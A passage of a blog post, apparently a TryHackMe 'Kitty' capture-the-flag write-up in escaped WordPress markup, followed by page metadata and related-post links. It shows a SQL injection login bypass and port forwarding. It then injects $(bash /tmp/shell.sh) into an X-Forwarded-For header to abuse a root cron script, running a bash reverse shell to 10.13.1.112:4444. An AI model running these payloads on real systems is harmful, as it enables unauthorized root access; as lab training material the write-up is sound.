<\/span><<\/span>input<\/span> <\/span>type=<\/span>"<\/span>password<\/span>"<\/span> <\/span>name=<\/span>"<\/span>password<\/span>"<\/span> <\/span>class=<\/span>"<\/span>form-control<\/span>"<\/span>><\/span><\/span>\n            <\/span><<\/span>\/div><\/span><\/span>\n            <\/span><<\/span>div<\/span> <\/span>class=<\/span>"<\/span>form-group<\/span>"<\/span>><\/span><\/span>\n                <\/span><<\/span>input<\/span> <\/span>type=<\/span>"<\/span>submit<\/span>"<\/span> <\/span>class=<\/span>"<\/span>btn btn-primary<\/span>"<\/span> <\/span>value=<\/span>"<\/span>Login<\/span>"<\/span>><\/span><\/span>\n\t    <\/span><<\/span>\/div><\/span><\/span>\n\t    <\/span><<\/span>p>Don<\/span>'t have an account? <a href="register.php">Sign up now<\/a>.<\/p><\/span><\/span>\n        <\/form><\/span><\/span>\n    <\/div><\/span><\/span>\n<\/body><\/span><\/span>\n<\/html><\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    Since we have SSH access, we can do SSH port forwarding.<\/p>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    \u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>ssh<\/span> <\/span>-L<\/span> <\/span>9090<\/span>:127.0.0.1:8080<\/span> <\/span>kitty@kitty.thm<\/span><\/span>\nkitty@kitty.thm<\/span>'s password: <\/span><\/span>\nWelcome to Ubuntu 20.04.5 LTS (GNU\/Linux 5.4.0-139-generic x86_64)<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    \"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
    <\/div>\n\n\n\n
    Both websites seem to be working the same way. If we try SQLi, it gives us the below message.<\/p>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    \u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>curl<\/span> <\/span>'<\/span>http:\/\/127.0.0.1:9090\/index.php<\/span>'<\/span> <\/span>-d<\/span> <\/span>"<\/span>username=blah' OR '1'='1-- -&password=a<\/span>"<\/span> <\/span>-H<\/span> <\/span>'<\/span>X-Forwarded-For: blahblah<\/span>'<\/span><\/span>\n<\/span>\nSQL<\/span> <\/span>Injection<\/span> <\/span>detected.<\/span> <\/span>This<\/span> <\/span>incident<\/span> <\/span>will<\/span> <\/span>be<\/span> <\/span>logged!<\/span>  <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/var\/www\/development$<\/span> <\/span>tail<\/span> <\/span>logged<\/span><\/span>\nblahblah<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    If we compare the source code for both web pages, we see that the development site tries to\u00a0log the IP <\/strong>of a visitor\u00a0using the\u00a0X-Forwarded-For<\/strong>\u00a0header whenever an\u00a0SQL Injection attempt\u00a0takes place. It logs this on a file located in\u00a0\/var\/www\/development\/logged<\/strong>.<\/p>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/var\/www$<\/span> <\/span>diff<\/span> <\/span>development\/index.php<\/span> <\/span>html\/index.php<\/span> <\/span><\/span>\n19,21d18<\/span><\/span>\n<<\/span> \t\t$ip = $_SERVER<\/span>[<\/span>'<\/span>HTTP_X_FORWARDED_FOR<\/span>'<\/span>];<\/span><\/span>\n<<\/span> \t\t$ip .= <\/span>"<\/span>\\n<\/span>"<\/span>;<\/span><\/span>\n<<\/span> \t\tfile_put_contents<\/span>(<\/span>"\/var\/www\/development\/logged"<\/span>,<\/span> $ip<\/span>);<\/span><\/span>\n24,27c21<\/span><\/span>\n<<\/span> \t\techo <\/span>'<\/span>SQL Injection detected. This incident will be logged!<\/span>'<\/span>;<\/span><\/span>\n<<\/span> \t\t$ip = $_SERVER<\/span>[<\/span>'<\/span>HTTP_X_FORWARDED_FOR<\/span>'<\/span>];<\/span><\/span>\n<<\/span> \t\t$ip .= <\/span>"<\/span>\\n<\/span>"<\/span>;<\/span><\/span>\n<<\/span> \t\tfile_put_contents<\/span>(<\/span>"\/var\/www\/development\/logged"<\/span>,<\/span> $ip<\/span>);<\/span>\t<\/span><\/span>\n---<\/span><\/span>\n><\/span> \t\techo <\/span>'<\/span>SQL Injection detected. This incident will be logged!<\/span>'<\/span>;<\/span>\t<\/span><\/span>\n67c61<\/span><\/span>\n<<\/span>         <\/span><<\/span>h<\/span>2><\/span>Development User Login<\/span><<\/span>\/h<\/span>2><\/span><\/span>\n---<\/span><\/span>\n><\/span>         <\/span><<\/span>h<\/span>2><\/span>User Login<\/span><<\/span>\/h<\/span>2><\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    Running PSPY <\/mark><\/em>revealed a cron job run by root every minute and modifying the file located at \/opt_log_checker.sh<\/mark><\/strong><\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/tmp$<\/span> <\/span>wget<\/span> <\/span>http:\/\/10.13.1.112\/pspy<\/span><\/span>\n--2024-02-06<\/span> <\/span>01<\/span>:43:09--<\/span>  <\/span>http:\/\/10.13.1.112\/pspy<\/span><\/span>\nConnecting<\/span> <\/span>to<\/span> <\/span>10.13<\/span>.1.112:80...<\/span> <\/span>connected.<\/span><\/span>\nHTTP<\/span> <\/span>request<\/span> <\/span>sent,<\/span> <\/span>awaiting<\/span> <\/span>response...<\/span> <\/span>200<\/span> <\/span>OK<\/span><\/span>\nLength:<\/span> <\/span>3104768<\/span> (3.0M) <\/span>[<\/span>application\/octet-stream<\/span>]<\/span><\/span>\nSaving<\/span> <\/span>to:<\/span> <\/span>\u2018pspy\u2019<\/span><\/span>\n<\/span>\npspy<\/span>                       <\/span>100<\/span>%[=======================================<\/span>=<\/span>><\/span>]<\/span>   <\/span>2.96<\/span>M<\/span>   <\/span>303<\/span>KB\/s<\/span>    <\/span>in<\/span> <\/span>11<\/span>s<\/span>     <\/span><\/span>\n<\/span>\n2024-02-06<\/span> <\/span>01<\/span>:43:20<\/span> (264 <\/span>KB\/s<\/span>) - \u2018pspy\u2019 saved <\/span>[<\/span>3104768<\/span>\/3104768<\/span>]<\/span><\/span>\n<\/span>\nkitty@kitty:\/tmp$<\/span> <\/span>chmod<\/span> <\/span>+x<\/span> <\/span>pspy<\/span> <\/span><\/span>\nkitty@kitty:\/tmp$<\/span> <\/span>.\/pspy<\/span> <\/span><\/span>\npspy<\/span> <\/span>-<\/span> <\/span>version:<\/span> <\/span>v1.2.1<\/span> <\/span>-<\/span> <\/span>Commit<\/span> <\/span>SHA:<\/span> <\/span>f9e6a1590a4312b9faa093d8dc84e19567977a6d<\/span><\/span>\n<\/span>\n<\/span>\n     <\/span>\u2588\u2588\u2593\u2588\u2588\u2588<\/span>    <\/span>\u2588\u2588\u2588\u2588\u2588\u2588<\/span>  <\/span>\u2588\u2588\u2593\u2588\u2588\u2588<\/span> <\/span>\u2593\u2588\u2588<\/span>   <\/span>\u2588\u2588\u2593<\/span><\/span>\n    <\/span>\u2593\u2588\u2588\u2591<\/span>  <\/span>\u2588\u2588\u2592\u2592\u2588\u2588<\/span>    <\/span>\u2592<\/span> <\/span>\u2593\u2588\u2588\u2591<\/span>  <\/span>\u2588\u2588\u2592\u2592\u2588\u2588<\/span>  <\/span>\u2588\u2588\u2592<\/span><\/span>\n    <\/span>\u2593\u2588\u2588\u2591<\/span> <\/span>\u2588\u2588\u2593\u2592\u2591<\/span> <\/span>\u2593\u2588\u2588\u2584<\/span>   <\/span>\u2593\u2588\u2588\u2591<\/span> <\/span>\u2588\u2588\u2593\u2592<\/span> <\/span>\u2592\u2588\u2588<\/span> <\/span>\u2588\u2588\u2591<\/span><\/span>\n    <\/span>\u2592\u2588\u2588\u2584\u2588\u2593\u2592<\/span> <\/span>\u2592<\/span>  <\/span>\u2592<\/span>   <\/span>\u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592<\/span> <\/span>\u2592<\/span> <\/span>\u2591<\/span> <\/span>\u2590\u2588\u2588\u2593\u2591<\/span><\/span>\n    <\/span>\u2592\u2588\u2588\u2592<\/span> <\/span>\u2591<\/span>  <\/span>\u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592<\/span> <\/span>\u2591<\/span>  <\/span>\u2591<\/span> <\/span>\u2591<\/span> <\/span>\u2588\u2588\u2592\u2593\u2591<\/span><\/span>\n    <\/span>\u2592\u2593\u2592\u2591<\/span> <\/span>\u2591<\/span>  <\/span>\u2591\u2592<\/span> <\/span>\u2592\u2593\u2592<\/span> <\/span>\u2592<\/span> <\/span>\u2591\u2592\u2593\u2592\u2591<\/span> <\/span>\u2591<\/span>  <\/span>\u2591<\/span>  <\/span>\u2588\u2588\u2592\u2592\u2592<\/span> <\/span><\/span>\n    <\/span>\u2591\u2592<\/span> <\/span>\u2591<\/span>     <\/span>\u2591<\/span> <\/span>\u2591\u2592<\/span>  <\/span>\u2591<\/span> <\/span>\u2591\u2591\u2592<\/span> <\/span>\u2591<\/span>     <\/span>\u2593\u2588\u2588<\/span> <\/span>\u2591\u2592\u2591<\/span> <\/span><\/span>\n    <\/span>\u2591\u2591<\/span>       <\/span>\u2591<\/span>  <\/span>\u2591<\/span>  <\/span>\u2591<\/span>  <\/span>\u2591\u2591<\/span>       <\/span>\u2592<\/span> <\/span>\u2592<\/span> <\/span>\u2591\u2591<\/span>  <\/span><\/span>\n                   <\/span>\u2591<\/span>           <\/span>\u2591<\/span> <\/span>\u2591<\/span>     <\/span><\/span>\n                               <\/span>\u2591<\/span> <\/span>\u2591<\/span>    <\/span><\/span>\n                               <\/span><\/span>\n <\/span>..<\/span><SNIPPED><\/span>..<\/span><\/span>\n <\/span><\/span>\n2024\/02\/06<\/span> <\/span>01<\/span>:43:32<\/span> <\/span>CMD:<\/span> <\/span>UID=<\/span>0<\/span>     <\/span>PID=<\/span>1<\/span>      <\/span>|<\/span> <\/span>\/sbin\/init<\/span> <\/span>maybe-ubiquity<\/span> <\/span><\/span>\n2024\/02\/06<\/span> <\/span>01<\/span>:44:01<\/span> <\/span>CMD:<\/span> <\/span>UID=<\/span>0<\/span>     <\/span>PID=<\/span>1616<\/span>   <\/span>|<\/span> <\/span>\/usr\/sbin\/CRON<\/span> <\/span>-f<\/span> <\/span><\/span>\n2024\/02\/06<\/span> <\/span>01<\/span>:44:01<\/span> <\/span>CMD:<\/span> <\/span>UID=<\/span>0<\/span>     <\/span>PID=<\/span>1615<\/span>   <\/span>|<\/span> <\/span>\/usr\/sbin\/CRON<\/span> <\/span>-f<\/span> <\/span><\/span>\n2024\/02\/06<\/span> <\/span>01<\/span>:44:01<\/span> <\/span>CMD:<\/span> <\/span>UID=<\/span>0<\/span>     <\/span>PID=<\/span>1617<\/span>   <\/span>|<\/span> <\/span>\/bin\/sh<\/span> <\/span>-c<\/span> <\/span>\/usr\/bin\/bash<\/span> <\/span>\/opt\/log_checker.sh<\/span> <\/span><\/span>\n2024\/02\/06<\/span> <\/span>01<\/span>:44:01<\/span> <\/span>CMD:<\/span> <\/span>UID=<\/span>0<\/span>     <\/span>PID=<\/span>1618<\/span>   <\/span>|<\/span> <\/span>\/usr\/bin\/bash<\/span> <\/span>\/opt\/log_checker.sh<\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    Let’s check the file contents to understand what is happening.<\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/tmp$<\/span> <\/span>cat<\/span> <\/span>\/opt\/log_checker.sh<\/span> <\/span><\/span>\n#!\/bin\/sh<\/span><\/span>\nwhile<\/span> <\/span>read<\/span> <\/span>ip<\/span>;<\/span><\/span>\ndo<\/span><\/span>\n  <\/span>\/usr\/bin\/sh<\/span> <\/span>-c<\/span> <\/span>"<\/span>echo <\/span>$ip<\/span> >> \/root\/logged<\/span>"<\/span>;<\/span><\/span>\ndone<\/span> <\/span><<\/span> \/var\/www\/development\/logged<\/span><\/span>\ncat<\/span> <\/span>\/dev\/null<\/span> <\/span>><\/span> <\/span>\/var\/www\/development\/logged<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    Let’s break down the script and try to understand what it is doing:<\/p>\n\n\n\n
      \n
    • The script reads IP addresses from a file located at \/var\/www\/development\/logged<\/code><\/li>\n\n\n\n
    • Next, appends each IP address to the file \/root\/logged<\/code><\/li>\n\n\n\n
    • Lastly, clears the original file \/var\/www\/development\/logged<\/code><\/li>\n<\/ul>\n\n\n\n
      Examining the script, we can also see that it loops through each line of the logged file and saves the contents to another file. We can see that it is vulnerable to command injection via the\u00a0sh -c “echo $ip<\/strong>\u00a0line. We don’t have write access to the script but because we control what goes on this file, we can achieve command injection and try to get a reverse shell as root.<\/p>\n\n\n\n
      Let’s create a bash script with a reverse shell one-liner.<\/p>\n\n\n\n
      <\/div>\n\n\n\n
      <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
      kitty@kitty:~$<\/span> <\/span>cd<\/span> <\/span>\/tmp<\/span><\/span>\nkitty@kitty:\/tmp$<\/span> <\/span>nano<\/span> <\/span>shell.sh<\/span><\/span>\nkitty@kitty:\/tmp$<\/span> <\/span>cat<\/span> <\/span>shell.sh<\/span> <\/span><\/span>\nbash<\/span> <\/span>-c<\/span> <\/span>'<\/span>bash -i >& \/dev\/tcp\/10.13.1.112\/4444 0>&1<\/span>'<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
      <\/div>\n\n\n\n
      Now, if we run the cURL command below, we would get the shell as root!<\/p>\n\n\n\n
      <\/div>\n\n\n\n
      <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
      kitty@kitty:\/tmp$<\/span> <\/span>curl<\/span> <\/span>'<\/span>http:\/\/127.0.0.1:8080\/index.php<\/span>'<\/span> <\/span>-d<\/span> <\/span>"<\/span>username=blah' OR '1'='1-- -&password=blah<\/span>"<\/span> <\/span>-H<\/span> <\/span>'<\/span>X-Forwarded-For: $(bash \/tmp\/shell.sh)<\/span>'<\/span><\/span>\n<\/span>\nSQL<\/span> <\/span>Injection<\/span> <\/span>detected.<\/span> <\/span>This<\/span> <\/span>incident<\/span> <\/span>will<\/span> <\/span>be<\/span> <\/span>logged!<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
      <\/div>\n\n\n\n
      <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
      \u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>nc<\/span> <\/span>-lvnp<\/span> <\/span>4444<\/span><\/span>\nlistening<\/span> <\/span>on<\/span> [any] 4444 ...<\/span><\/span>\nconnect<\/span> <\/span>to<\/span> [10.13.1.112] from <\/span>(<\/span>UNKNOWN<\/span>)<\/span> <\/span>[<\/span>10.10<\/span>.49.10<\/span>]<\/span> 60092<\/span><\/span>\nbash:<\/span> <\/span>cannot<\/span> <\/span>set<\/span> <\/span>terminal<\/span> <\/span>process<\/span> <\/span>group<\/span> (2264): Inappropriate ioctl <\/span>for<\/span> device<\/span><\/span>\nbash:<\/span> <\/span>no<\/span> <\/span>job<\/span> <\/span>control<\/span> <\/span>in<\/span> <\/span>this<\/span> <\/span>shell<\/span><\/span>\nroot@kitty:~#<\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
      <\/div>\n\n\n\n
      Conclusion<\/mark><\/h3>\n\n\n\n
      This box has two injection-type attacks–SQL injection to get a foothold and Command injection to get root. Although the box was vulnerable to SQLi, sqlmap <\/em><\/strong><\/mark>was unable to find the injection point. Automating the SQLi gave us the username and password from the MySQL database. It was important to understand the cron job and what it is doing to successfully abuse the script to carry out command injection and get root access.<\/p>\n","protected":false},"excerpt":{"rendered":"
      Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. PORT 80 HTTP The webpage has a login form. We […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,43,11,13,42,12],"tags":[],"class_list":["post-422","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-command-injection","category-ctf-write-ups","category-linux","category-sql-injection","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":422,"position":0},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":422,"position":1},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":422,"position":2},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":422,"position":3},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In "Active Directory"","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":422,"position":4},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":422,"position":5},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=422"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422\/revisions"}],"predecessor-version":[{"id":446,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422\/revisions\/446"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}